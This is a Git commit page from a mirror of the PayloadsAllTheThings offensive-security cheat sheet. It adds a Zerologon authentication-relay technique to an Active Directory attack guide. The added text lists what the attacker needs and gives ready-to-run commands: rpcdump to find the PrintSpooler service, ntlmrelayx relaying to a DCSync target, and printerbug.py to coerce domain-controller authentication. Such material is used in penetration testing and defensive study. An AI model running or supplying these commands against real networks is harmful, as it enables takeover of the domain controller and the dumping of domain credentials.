ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added zerologon authentication relay technique

Browse Source
This commit is contained in:
Darktortue 2023-01-10 11:23:45 +01:00 committed by GitHub
parent d4742a9688
commit 8caba394d5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
Methodology and Resources/Active Directory Attack.md
View File

@ -662,6 +662,26 @@ Exploit steps from the white paper
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon
``` ```
A 2nd approach to exploit zerologon is done by relaying authentication.
This technique, [found by dirkjanm](https://dirkjanm.io/a-different-way-of-abusing-zerologon), requires more prerequisites but has the advantage of having no impact on service continuity.
The following prerequisites are needed:
* A domain account
* One DC running the `PrintSpooler` service
* Another DC vulnerable to zerologon
* `ntlmrelayx` - from Impacket and any tool such as [`printerbug.py`](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)
```powershell
# Check if one DC is running the PrintSpooler service
rpcdump.py 10.10.10.10 | grep -A 6 "spoolsv"
# Setup ntlmrelay in one shell
ntlmrelayx.py -t dcsync://DC01.LAB.LOCAL -smb2support
#Trigger printerbug in 2nd shell
python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12
```
#### PrintNightmare #### PrintNightmare
> CVE-2021-1675 / CVE-2021-34527 > CVE-2021-1675 / CVE-2021-34527